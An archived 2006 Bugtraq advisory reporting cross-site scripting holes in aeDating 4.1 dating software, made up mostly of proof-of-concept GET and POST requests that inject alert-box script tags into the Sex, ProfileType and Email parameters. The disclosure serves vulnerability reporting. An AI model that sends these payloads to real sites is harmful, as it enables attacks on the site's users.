| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060622172315.23677.qmail@securityfocus.com> Date: 22 Jun 2006 17:23:15 -0000 From: securityconnection@...il.com To: bugtraq@...urityfocus.com Subject: aeDating 4.1 XSS Product of AEwebworks Dating Software http://www.aewebworks.com/ --------------------------- Cross Site Scripting (XSS) --------------------------- http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test/)</script>&Mode=last ^"G4" Template work^ --- POST /join_form.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 1685 page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&WhereChildren= --- POST /forgot.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 65 Email="><script>alert(/Elipsis+Security+Test/)</script> ----------------- Ellipsis Security http://www.ellsec.org
Powered by blists - more mailing lists